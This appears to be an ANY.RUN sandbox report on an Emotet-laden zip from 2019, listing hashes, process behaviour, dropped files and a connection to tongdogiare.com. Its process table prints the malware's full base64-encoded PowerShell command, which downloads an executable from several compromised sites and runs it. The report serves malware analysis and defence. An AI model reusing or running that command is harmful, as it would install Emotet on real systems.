analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

sample.zip

Full analysis: https://app.any.run/tasks/fd729e81-22e5-4de1-a23a-2a0f2497ebae
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 14, 2019, 15:20:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

E0BAAF15FF9ABA4CCACC7901461A7B7D

SHA1:

43A91D452F6BE306CFB1F0C0C0710C775780991C

SHA256:

785A7393000AEA7B7F5E252E9DC22936666853C38B2BB34C92530095D45CD16C

SSDEEP:

3072:R8BZjyqMxwEQkPSMc9eva6ziHeGVp6meADYEX1ZYIG0VM8t:R8B5BMfIoaNRVgWDTX1ZbG4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops known malicious document

      • WinRAR.exe (PID: 2104)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2064)

    • Executed via WMI

      • powershell.exe (PID: 2064)

    • PowerShell script executed

      • powershell.exe (PID: 2064)

  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3012)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3012)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3012)

    • Dropped object may contain Bitcoin addresses

      • WinRAR.exe (PID: 2104)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 788
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2019:10:14 15:20:03
ZipCRC: 0x5e240e69
ZipCompressedSize: 166608
ZipUncompressedSize: 280064
ZipFileName: 39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2104"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\sample.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3012"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\papajohns.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2064powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADMAMAAyAGIAMwA4ADAANwAwADAANgA9ACcAYwAwADAAMAAwADgAMwBjAGMAMwAwACcAOwAkAGIANQAyADAAOQAzADIAMAA3ADcAMAAwACAAPQAgACcANQAyADAAJwA7ACQAYgA0ADgAOAAzADUAYgA5ADAAMwAwAD0AJwBiADAANgBiAGMAeAAyADAANwA3ADAAMAB4ACcAOwAkAHgAMABjAHgANAA1AHgAMAA0AHgAOAA4AHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGIANQAyADAAOQAzADIAMAA3ADcAMAAwACsAJwAuAGUAeABlACcAOwAkAHgANgA0ADcANgA1ADMAMQBiADEAYwA9ACcAeABjADgAMAA4ADAAMAAzADcAMQA5ADUANwAnADsAJABjADcAYgA0ADMAMgA2ADkAOQAxADEANwBiAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlAGMAJwArACcAdAAnACkAIABOAGUAVAAuAHcARQBCAGMAbABpAEUATgBUADsAJABjADkAMQAwAHgANQA3AGIAOABjADMAPQAnAGgAdAB0AHAAcwA6AC8ALwB0AG8AbgBnAGQAbwBnAGkAYQByAGUALgBjAG8AbQAvAGkAYgBrAHMAbABxAGsAMQBsAGYALwBmAHAAbQBmADEAXwB3AHoAMwBzAHIALQA4ADcANQAwADEANAAwADYANwAvAEAAaAB0AHQAcABzADoALwAvAGUAZwB5AGEAbgBwAHUAbABzAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGkAMQBuAHoAXwB1AGEAdABhADAAMwAzADUAYQAtADYALwBAAGgAdAB0AHAAcwA6AC8ALwBzAHAAYQBjAGUANABwAHIAbwBtAG8AdABpAG8AbgBzAC4AYwBvAG0ALwBhAHMAcwBlAHQAcwAvAHUAcABsAG8AYQBkAHMALwBhAGgAbgB4AFIARwByAHkALwBAAGgAdAB0AHAAOgAvAC8AMQAwADAAMABhAHQAYQBwAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGwAbwBhAGQAcwAvADAAZwA3AGMAXwB0AGUANgBqAGoAYgBtAGMALQAxADYALwBAAGgAdAB0AHAAOgAvAC8AYQBjAGEAZABlAG0AaQBhAC4AcwBwAHIAaQBuAHQANwAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAE8ASABLAGQATQBmAFkAdgB1AC8AJwAuACIAUwBQAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGMAOAA5ADMANAAwADYAMgAwADIANwAxAGMAPQAnAGMAMAAxADIAMAA1ADAAeAAzAGIAMgAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABiADAAOAA3ADAAMgAwADAANwA0ADMAIABpAG4AIAAkAGMAOQAxADAAeAA1ADcAYgA4AGMAMwApAHsAdAByAHkAewAkAGMANwBiADQAMwAyADYAOQA5ADEAMQA3AGIALgAiAGQAbwB3AGAATgBMAG8AQQBkAGAARgBpAGwARQAiACgAJABiADAAOAA3ADAAMgAwADAANwA0ADMALAAgACQAeAAwAGMAeAA0ADUAeAAwADQAeAA4ADgAeAApADsAJABjAGMAMAAyADMANAA1ADYAMAA1AGIAPQAnAGMAOABiADkANwA4ADEAMwA5ADIAMgA0ADUAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJAB4ADAAYwB4ADQANQB4ADAANAB4ADgAOAB4ACkALgAiAEwAZQBOAEcAYABUAEgAIgAgAC0AZwBlACAAMwA3ADEAMAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABgAEEAUgBUACIAKAAkAHgAMABjAHgANAA1AHgAMAA0AHgAOAA4AHgAKQA7ACQAeABiADAAMAB4AGMAYwA4ADAAMAAyADAAPQAnAGMAMQAyADgAMQAzADIANAA4ADEAMwAnADsAYgByAGUAYQBrADsAJABjADgAMAAwADYAMABjADgANABiADcAPQAnAGIANAAwADAANAAyADAANwA2AGIAYgAwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAMAA0ADAAOABiAGMAMgAwAHgAMAA9ACcAeAA1ADMAYgA4ADAANwAwADAAOAAwACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 571
Read events
1 738
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
3012WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR2159.tmp.cvr
MD5:
SHA256:
2064powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z5XHP0OQQF4RQYA731J7.temp
MD5:
SHA256:
3012WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:1758F84A3F62413C7517AC6E872C99E9
SHA256:D61076D52014648BC5C9A8A77119F576836A83E788C834086572581A1908F908
3012WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9B04D17.wmfwmf
MD5:1BFE099A90FAB05C195222CD14B04102
SHA256:A6D1EDEF80BB10701BF1B2F2340A4A899C4CBC6FCDA894B1A75F7271FFE9D305
3012WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DD168D9.wmfwmf
MD5:26456A5B0F195CBF1182E6310ED4B97C
SHA256:AFEBC2496C157D8462F7A849721C959D303DCE7A4B931927993524A0C1E3BD73
3012WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4B2FEE38.wmfwmf
MD5:7336E71E93A1B0BFA6901D91FAA547C8
SHA256:4383262EF326FE758DA53407048F353265D86D1B14B70E74F19ACD45AEC5450E
2104WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2104.45929\39b828dfbbee573d93584d84c0ed2e9bfac65f44d9acab1a97bd052bd0e5b7b6.bindocument
MD5:FEC4795055DE05BA9B434BCF5F372E19
SHA256:39B828DFBBEE573D93584D84C0ED2E9BFAC65F44D9ACAB1A97BD052BD0E5B7B6
3012WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\166AE1EE.wmfwmf
MD5:34ED6F7A829314D7BDB154AD22EC92AF
SHA256:28DAC4CED4FE090DF96FDCCC4A579DA28D2F5C2A76DA37E14B92AC4CDBAC6CC2
3012WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F388E3D.wmfwmf
MD5:60EBC56D56472CA242A746C96EC337EB
SHA256:4FC019E24824CAC6246AEAD69E56002EF20EED33A5DF8EDD551BCE02334CE9E9
3012WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3495361.wmfwmf
MD5:0D1C5E4D9DE440BF2991A05E04577B97
SHA256:6199B78311078F8CF0AFDEA6AB23E83E50967E7ADE60C5E7B6622098837FFE48
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
172.104.51.209:443
tongdogiare.com
Linode, LLC
SG
unknown

DNS requests

Domain
IP
Reputation
tongdogiare.com
  • 172.104.51.209
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
sample.zip